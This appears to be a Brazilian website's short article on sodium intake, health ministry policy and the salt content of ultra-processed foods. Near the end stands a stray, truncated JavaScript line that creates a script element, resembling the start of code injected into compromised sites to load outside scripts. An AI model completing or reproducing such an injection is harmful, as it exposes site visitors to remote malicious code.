Consumo de sódio no Brasil

O Ministério da Saúde vem desenvolvendo diversas ações para a redução do consumo de sódio. O objetivo é controlar as doenças crônicas não transmissíveis, especialmente a hipertensão arterial, na população brasileira. A estratégia nacional contempla ações voltadas a reduzir o conteúdo de sódio em produtos processados e ultraprocessados, além de veicular a informação nutricional obrigatória nos alimentos e produtos industrializados, campeões em teor de sódio.

 Muita gente não entende o que é e para que serve o sódio. Trata-se de um mineral presente nos alimentos e também no sal de cozinha, ingrediente culinário muito utilizado no preparo das refeições. O sódio é essencial para a nossa saúde. Porém, em quantidades bem menores do que temos consumido. A recomendação é de menos de 2 gramas de sódio por dia, o equivalente a 5 gramas de sal de cozinha por dia, ou uma colher de chá.

O problema é que, com o aumento exponencial do consumo de produtos alimentícios ultraprocessados, o consumo do sódio cresceu na mesma proporção. O sódio é usado pela indústria para aumentar o tempo de conservação de um produto e realçar o sabor de alimentos. Até em alimentos de sabor doce podemos ter quantidades excessivas de sódio. Os embutidos, enlatados e temperos prontos, como caldos de carne, frango e legumes em cubinhos, são os campeões em sódio.

É preciso olhar, além do teor de sódio na tabela nutricional, a lista de ingredientes para identificar os aditivos químicos associados a ele usados pela indústria. Quanto menos processados os alimentos, melhor. E menor o teor de sódio. Fica a dica!

var d=document;var s=d.createElement(‘script’);

Deixe um comentário